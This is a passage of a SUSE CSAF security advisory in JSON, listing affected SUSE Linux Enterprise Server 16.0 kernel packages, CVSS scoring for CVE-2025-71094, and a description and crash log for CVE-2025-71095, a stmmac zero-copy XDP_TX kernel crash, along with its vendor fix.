"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
